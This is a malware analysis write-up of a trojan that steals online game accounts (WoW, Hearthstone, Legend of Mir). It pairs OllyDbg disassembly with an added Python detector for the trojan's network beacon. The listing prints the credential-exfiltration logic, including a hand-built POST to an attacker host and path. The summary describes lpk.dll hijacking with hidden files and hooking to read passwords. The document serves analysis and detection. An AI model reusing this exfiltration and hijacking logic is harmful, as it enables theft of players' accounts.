100057E0 |. FFD6 call esi ; \SendMessageA
.......
10005B1B |. 68 54340210 push 10023454 ; /cast Hearthstone
10005B20 |. 68 78C80210 push 1002C878
10005B25 |. E8 46DF0000 call 10013A70
10005B2A |. 68 50340210 push 10023450 ; cn
10005B2F |. 68 58F70210 push 1002F758
10005B34 |. E8 07DC0000 call <比较cmp>
10005B39 |. 83C4 1C add esp, 1C
10005B3C |. 85C0 test eax, eax
10005B3E |. 74 1C je short 10005B5C
10005B40 |. 68 44340210 push 10023444 ; /cast 炉石
10005B45 |. 68 78C80210 push 1002C878
10005B4A |. E8 21DF0000 call 10013A70
10005B4F |. 68 78C80210 push 1002C878
10005B54 |. E8 1FC5FFFF call 10002078
10005B59 |. 83C4 0C add esp, 0C
10005B5C |> 68 40340210 push 10023440 ; tw
Here it determines Horde or Alliance and reads the account information:
10005C19 |. 68 2C340210 push 1002342C ; %s[lm]
10005C1E |. 50 push eax
10005C1F |. E8 A2DB0000 call <字符处理函数>
10005C24 |. 83C4 0C add esp, 0C
10005C27 |> 833D 3C170310 0>cmp dword ptr [1003173C], 2
10005C2E |. 75 12 jnz short 10005C42
10005C30 |. 56 push esi
10005C31 |. 8D45 AC lea eax, [local.21]
10005C34 |. 68 24340210 push 10023424 ; %s[bl]
10005C39 |. 50 push eax
10005C3A |. E8 87DB0000 call <字符处理函数>
10005C3F |. 83C4 0C add esp, 0C
10005C42 |> 8D85 CCFEFFFF lea eax, [local.77]
10005C48 |. 50 push eax
10005C49 |. 8D45 AC lea eax, [local.21]
10005C4C |. 50 push eax
10005C4D |. E8 DEC4FFFF call 10002130
10005C52 |. 68 50340210 push 10023450 ; cn
10005C57 |. BB 58F70210 mov ebx, 1002F758
10005C5C |. 53 push ebx
10005C5D |. E8 DEDA0000 call <比较cmp>
10005C62 |. 83C4 10 add esp, 10
10005C65 |. BE F8120310 mov esi, 100312F8
10005C6A |. BF 10270000 mov edi, 2710
10005C6F |. 85C0 test eax, eax
10005C71 |. 74 25 je short 10005C98
10005C73 |. A1 68170310 mov eax, dword ptr [10031768]
10005C78 |. 33D2 xor edx, edx
10005C7A |. 8BCF mov ecx, edi
10005C7C |. F7F1 div ecx
10005C7E |. 56 push esi
10005C7F |. 50 push eax
10005C80 |. 8D45 AC lea eax, [local.21]
10005C83 |. 50 push eax
10005C84 |. 8D85 CCFAFFFF lea eax, [local.333]
10005C8A |. 68 00340210 push 10023400 ; wq=0&wf=%s&ws=%d&bb=%s&d=g&yx=wow
10005C8F |. 50 push eax
10005C90 |. E8 31DB0000 call <字符处理函数>
10005C95 |. 83C4 14 add esp, 14
10005C98 |> 68 40340210 push 10023440 ; tw
10005C9D |. 53 push ebx
10005C9E |. E8 9DDA0000 call <比较cmp>
10005CA3 |. 59 pop ecx
10005CA4 |. 59 pop ecx
10005CA5 |. 85C0 test eax, eax
10005CA7 |. 74 25 je short 10005CCE
.......
10005D66 |. 68 54330210 push 10023354 ; wq=0&wf=%s&ws=%d&bb=%s&d=g&yx=wowkr
10005D6B |. 50 push eax
10005D6C |. E8 55DA0000 call <字符处理函数>
10005D71 |. 83C4 14 add esp, 14
10005D74 |> 68 00280000 push 2800
10005D79 |. 8D85 CCD2FFFF lea eax, [local.2893]
10005D7F |. 50 push eax
10005D80 |. 8D85 CCFAFFFF lea eax, [local.333]
10005D86 |. 50 push eax
10005D87 |. 68 38330210 push 10023338 ; Skin/201/Menu/lib/fds.asp
10005D8C |. 6A 50 push 50
10005D8E |. 68 24330210 push 10023324 ; www.5913game.com
10005D93 |. E8 02C5FFFF call 1000229A ; sends the account information (key call)
Key call:
1000229A /$ 55 push ebp
1000229B |. 8BEC mov ebp, esp
1000229D |. B8 A8180000 mov eax, 18A8
100022A2 |. E8 791D0100 call 10014020
100022A7 |. A1 60B00210 mov eax, dword ptr [1002B060]
100022AC |. 33C5 xor eax, ebp
....... // after the data is processed, the account information is posted, completing the theft
1000236B |. 68 38290210 push 10022938 ; POST /%s
10002370 |. 50 push eax
10002371 |. E8 50140100 call <字符处理函数>
10002376 |. 8D85 7CE7FFFF lea eax, [local.1569]
1000237C |. 68 58290210 push 10022958 ; HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost:
10002381 |. 50 push eax
10002382 |. E8 F9160100 call 10013A80
10002387 |. FFB5 68E7FFFF push [local.1574]
1000238D |. 8D85 7CE7FFFF lea eax, [local.1569]
10002393 |. 50 push eax
10002394 |. E8 E7160100 call 10013A80
10002399 |. 8D85 7CE7FFFF lea eax, [local.1569]
1000239F |. 68 24290210 push 10022924 ; \r\nConnection: closePOST /%s
100023A4 |. 50 push eax
100023A5 |. E8 D6160100 call 10013A80
100023AA |. 6A 7D push 7D
100023AC |. 8D85 7CFFFFFF lea eax, [local.33]
100023B2 |. 57 push edi
100023B3 |. 50 push eax
100023B4 |. E8 77F90000 call <清理一块内存空间出来>
100023B9 |. 56 push esi
100023BA |. E8 B1170100 call 10013B70
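Putting together the form body built at 10005C8A (and its wowkr variant at 10005D66) with the request assembled by hand at 1000236B-1000239F, here is an added Python example (not from the post or the sample) that parses a raw HTTP request and flags this exfiltration beacon by host, path and form shape. The host, path and field names come from the listing; the request bytes, the account values and the lm/bl faction reading are constructed or assumed.

```python
from urllib.parse import parse_qs

# Host, path and form field names as pushed in the listing (not constructed):
BEACON_HOST = "www.5913game.com"
BEACON_PATH = "/Skin/201/Menu/lib/fds.asp"
BEACON_KEYS = {"wq", "wf", "ws", "bb", "d", "yx"}
# Assumed reading of the tags appended to wf via "%s[lm]" / "%s[bl]":
FACTION_TAGS = {"[lm]": "alliance (lm)", "[bl]": "horde (bl)"}

def parse_http_request(raw: bytes) -> dict:
    """Minimal parser for the request the sample concatenates by hand:
    request line, headers, then the urlencoded body after the blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body.decode("latin-1")}

def classify_beacon(raw: bytes) -> dict:
    """Host, path and the wq/wf/ws/bb/d/yx form shape each count as one
    indicator; two or more is a match, so a moved host or path alone does
    not evade the check."""
    req = parse_http_request(raw)
    form = {k: v[0] for k, v in
            parse_qs(req["body"], keep_blank_values=True).items()}
    reasons = []
    if (req["method"] == "POST"
            and req["headers"].get("host", "").lower() == BEACON_HOST):
        reasons.append("host")
    if req["path"].split("?", 1)[0].lower() == BEACON_PATH.lower():
        reasons.append("path")
    if (BEACON_KEYS <= set(form) and form["d"] == "g"
            and form["yx"].startswith("wow")):
        reasons.append("form-shape")
    tag = next((t for t in FACTION_TAGS if form.get("wf", "").endswith(t)), None)
    return {"match": len(reasons) >= 2, "reasons": reasons,
            "faction": FACTION_TAGS.get(tag), "form": form}

# Constructed request in the exact shape the listing assembles; the account
# values are placeholders, not data recovered from the sample.
SAMPLE_BEACON = (
    b"POST /Skin/201/Menu/lib/fds.asp HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: www.5913game.com\r\n"
    b"Connection: close\r\n\r\n"
    b"wq=0&wf=CONSTRUCTED_NAME[lm]&ws=12&bb=CONSTRUCTED_SECRET&d=g&yx=wow"
)

if __name__ == "__main__":
    print(classify_beacon(SAMPLE_BEACON))
```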
The trojan's operations against the Legend of Mir game; I picked one jump point here to analyze:
100091B1 . 60 pushad
100091B2 . E8 12F1FFFF call 100082C9 ; key call
100091B7 . 61 popad
100091B8 . FF25 31020310 jmp dword ptr [10030231]
This call handles the Mir game operations; I have not played Mir. It includes things like unbinding equipment, manor operations, and so on.
100082C9 /$ 55 push ebp
100082CA |. 8BEC mov ebp, esp
100082CC |. 83EC 24 sub esp, 24
100082CF |. A1 60B00210 mov eax, dword ptr [1002B060]
100082D4 |. 33C5 xor eax, ebp
100082D6 |. 8945 FC mov [local.1], eax
100082D9 |. 53 push ebx
100082DA |. 56 push esi
........
100083CC |. 8D46 18 lea eax, dword ptr [esi+18]
100083CF |. 68 B8390210 push 100239B8 ; => huichenm装备成功解除绑定
100083D4 |. 50 push eax
100083D5 |. E8 66B30000 call <比较cmp>
100083DA |. 59 pop ecx
100083DB |. 59 pop ecx
100083DC |. 85C0 test eax, eax
100083DE |. 74 23 je short 10008403
100083E0 |. 53 push ebx
100083E1 |. 53 push ebx
100083E2 |. 53 push ebx
100083E3 |. 68 DF6D0010 push 10006DDF
100083E8 |. 53 push ebx
100083E9 |. 53 push ebx
100083EA |. FF15 5CC70210 call dword ptr [1002C75C]
100083F0 |. 50 push eax
100083F1 |. FF15 8C100310 call dword ptr [1003108C]
100083F7 |. 8B0D 54C60210 mov ecx, dword ptr [1002C654]
100083FD |. 33C0 xor eax, eax
100083FF |. 66:8941 10 mov word ptr [ecx+10], ax
10008403 |> BF AC390210 mov edi, 100239AC ; => zaimam
10008408 |. 8D46 18 lea eax, dword ptr [esi+18]
1000840B |. 57 push edi
1000840C |. 50 push eax
1000840D |. E8 2EB30000 call <比较cmp>
10008412 |. 59 pop ecx
10008413 |. 59 pop ecx
10008414 |. 85C0 test eax, eax
10008416 |. 0F84 EF000000 je 1000850B
1000841C |. 8D46 18 lea eax, dword ptr [esi+18]
1000841F |. 57 push edi
10008420 |. 50 push eax
10008421 |. E8 1AB30000 call <比较cmp>
10008426 |. 59 pop ecx
10008427 |. 59 pop ecx
10008428 |. 68 A0390210 push 100239A0 ; hxlchuaqia
1000842D |. 53 push ebx
1000842E |. 53 push ebx
1000842F |. 8945 DC mov [local.9], eax
10008432 |. FF15 E4C20210 call dword ptr [1002C2E4]
10008438 |. 6A 32 push 32
1000843A |. 53 push ebx
1000843B |. BF C4120310 mov edi, 100312C4
10008440 |. 57 push edi
10008441 |. C705 5C170310 0>mov dword ptr [1003175C], 1
1000844B |. E8 E0980000 call <清理一块内存空间出来>
10008450 |. 6A 03 push 3
10008452 |. 8D46 18 lea eax, dword ptr [esi+18]
........
100084E8 |> \53 push ebx
100084E9 |. 53 push ebx
100084EA |. 53 push ebx
100084EB |. 68 946C0010 push 10006C94 // Mir thread
100084F0 |. 53 push ebx
100084F1 |. 53 push ebx
100084F2 |. FF15 5CC70210 call dword ptr [1002C75C]
100084F8 |. 50 push eax
100084F9 |. FF15 8C100310 call dword ptr [1003108C]
100084FF |. 8B0D 54C60210 mov ecx, dword ptr [1002C654]
10008505 |. 33C0 xor eax, eax
10008507 |. 66:8941 10 mov word ptr [ecx+10], ax
1000850B |> 68 88390210 push 10023988 ; => tuichum
10008510 |. 8D7E 18 lea edi, dword ptr [esi+18]
10008513 |. 57 push edi
10008514 |. E8 27B20000 call <比较cmp>
10008519 |. 59 pop ecx
1000851A |. 59 pop ecx
1000851B |. 85C0 test eax, eax
1000851D |. 74 06 je short 10008525
1000851F |. 53 push ebx
10008520 |. E8 11CD0000 call 10015236
10008525 |> 68 78390210 push 10023978 ; => zhuangyuanm
Mir thread:
10006C94 /. 55 push ebp
10006C95 |. 8BEC mov ebp, esp
10006C97 |. 81EC 08010000 sub esp, 108
10006C9D |. A1 60B00210 mov eax, dword ptr [1002B060]
10006CA2 |. 33C5 xor eax, ebp
10006CA4 |. 8945 FC mov [local.1], eax
10006CA7 |. 833D 5C170310 0>cmp dword ptr [1003175C], 0
10006CAE |. 0F84 1F010000 je 10006DD3
10006CB4 |. 53 push ebx
10006CB5 |. 56 push esi
10006CB6 |. E8 59FFFFFF call 10006C14
10006CBB |. BE 00010000 mov esi, 100
10006CC0 |. 56 push esi
10006CC1 |. 8D85 FCFEFFFF lea eax, [local.65]
10006CC7 |. 6A 00 push 0
10006CC9 |. 50 push eax
10006CCA |. C785 F8FEFFFF 0>mov [local.66], 10023700 ; .
10006CD4 |. E8 57B00000 call <清理一块内存空间出来>
10006CD9 |. 83C4 0C add esp, 0C
10006CDC |. FF15 B0110310 call dword ptr [100311B0]
10006CE2 |. 3905 44C40210 cmp dword ptr [1002C444], eax
10006CE8 |. 74 0A je short 10006CF4
10006CEA |. C785 F8FEFFFF F>mov [local.66], 100236F0 ; 切出了游戏.
10006CF4 |> A1 60170310 mov eax, dword ptr [10031760]
10006CF9 |. BB E4360210 mov ebx, 100236E4 ; ,***已绑
10006CFE |. 83F8 01 cmp eax, 1
10006D01 |. 74 06 je short 10006D09
10006D03 |. 8B9D F8FEFFFF mov ebx, [local.66]
10006D09 |> 85C0 test eax, eax
10006D0B |. 75 05 jnz short 10006D12
10006D0D |. BB DC360210 mov ebx, 100236DC ; ,无绑
10006D12 |> 83F8 02 cmp eax, 2
10006D15 |. 75 05 jnz short 10006D1C
10006D17 |. BB D0360210 mov ebx, 100236D0 ; ,人物解绑
10006D1C |> 83F8 03 cmp eax, 3
10006D1F |. 75 05 jnz short 10006D26
10006D21 |. BB C4360210 mov ebx, 100236C4 ; ,装备解绑
10006D26 |> 56 push esi
10006D27 |. 8D85 FCFEFFFF lea eax, [local.65]
10006D2D |. 6A 00 push 0
10006D2F |. 50 push eax
10006D30 |. E8 FBAF0000 call <清理一块内存空间出来>
10006D35 |. FFB5 F8FEFFFF push [local.66]
10006D3B |. A1 F8140310 mov eax, dword ptr [100314F8]
10006D40 |. 53 push ebx
10006D41 |. FF30 push dword ptr [eax]
10006D43 |. A1 B8DF0210 mov eax, dword ptr [1002DFB8]
10006D48 |. FF30 push dword ptr [eax]
10006D4A |. A1 14160310 mov eax, dword ptr [10031614]
10006D4F |. FF30 push dword ptr [eax]
10006D51 |. 8D85 FCFEFFFF lea eax, [local.65]
10006D57 |. FF35 F0150310 push dword ptr [100315F0]
10006D5D |. 68 C4120310 push 100312C4
10006D62 |. 68 A8360210 push 100236A8 ; /%s %s:%d:%d[%d]密保[%s]%s
10006D67 |. 50 push eax
10006D68 |. E8 59CA0000 call <字符处理函数>
Rough flow of the sample:
1. After the sample is loaded in OD (OllyDbg), it obtains its own path and compares it against the corresponding game processes.
2. It drops the dynamic link library lpk.dll into the game installation directory, sets the file attributes to system and hidden, and gets loaded through lpk hijacking.
3. It steals the game account and password by hooking key functions, patching the game, and reading memory.
4. It sends the stolen information to a designated URL.